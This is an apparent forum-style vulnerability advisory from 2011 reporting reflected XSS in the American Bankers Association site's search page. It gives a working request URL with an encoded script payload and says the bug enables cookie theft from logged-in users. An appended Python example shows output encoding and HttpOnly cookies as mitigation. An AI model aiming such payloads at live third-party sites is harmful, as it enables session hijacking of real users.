########################################################
| Title  : American Bankers Association(aba.com) XSS
| Author : Codeine
| Email  : f3codeine[at]yahoo[dot]com
| Site   : http://infosecforums.com/
| Date   : 08/09/2011
| Cat    : PHP[XSS]
| URL    : http://aba.com/
########################################################

American Bankers Association uses a search script provided by "xSynthesis Search". After checking, no current version by them is vulnerable.
Since aba.com allows users to log in, this vulnerability presents a great security risk regarding cookie logging.
This is not persistent but still presents an area of risk.

[*]XSS Vulnerability
	http://www.aba.com/Search2/searchaba.aspx?xr=t&adv=t&PageSize=10&MaxPages=200&SearchKind=ExactPhrase&SearchPhrase=%3Cscript%3Ealert%28%27CodeineXSS%27%29%3B%3C%2Fscript%3E
	I used <script>alert('CodeineXSS');</script>; it works in all of the input fields.
______________________________________________________________________________________
Greetz Hidden Ninja
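
The mitigation for this kind of reflection, as an added example that is not part of the original advisory or the vendor's code: the SearchPhrase value from the URL above is HTML-encoded on output, and the session cookie is marked HttpOnly to limit the cookie risk mentioned. The page markup, the function names and the cookie name are assumptions.

```python
# Added example: constructed markup and names, not the vendor's search script.
from html import escape
from urllib.parse import urlsplit, parse_qs

# Request URL exactly as given in the advisory.
ADVISORY_URL = (
    "http://www.aba.com/Search2/searchaba.aspx?xr=t&adv=t&PageSize=10"
    "&MaxPages=200&SearchKind=ExactPhrase"
    "&SearchPhrase=%3Cscript%3Ealert%28%27CodeineXSS%27%29%3B%3C%2Fscript%3E"
)


def search_phrase(url):
    """Return the URL-decoded SearchPhrase parameter ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("SearchPhrase", [""])[0]


def render_vulnerable(phrase):
    """Reflects the parameter verbatim, so markup in it becomes page markup."""
    return ('<h2>Results for: ' + phrase + '</h2>'
            '<input name="SearchPhrase" value="' + phrase + '">')


def render_hardened(phrase):
    """HTML-encode on output; quote=True also covers the attribute context."""
    safe = escape(phrase, quote=True)
    return ('<h2>Results for: ' + safe + '</h2>'
            '<input name="SearchPhrase" value="' + safe + '">')


def session_cookie_header(session_id):
    """Hypothetical session cookie: HttpOnly keeps it out of document.cookie."""
    return (f"Set-Cookie: session={session_id}; "
            "HttpOnly; Secure; SameSite=Lax; Path=/")


if __name__ == "__main__":
    phrase = search_phrase(ADVISORY_URL)
    print("vulnerable:", render_vulnerable(phrase))
    print("hardened:  ", render_hardened(phrase))
    print(session_cookie_header("CONSTRUCTED-ID"))
```

Encoding has to happen at every place the value is written back, since the advisory reports the same behaviour in all of the input fields.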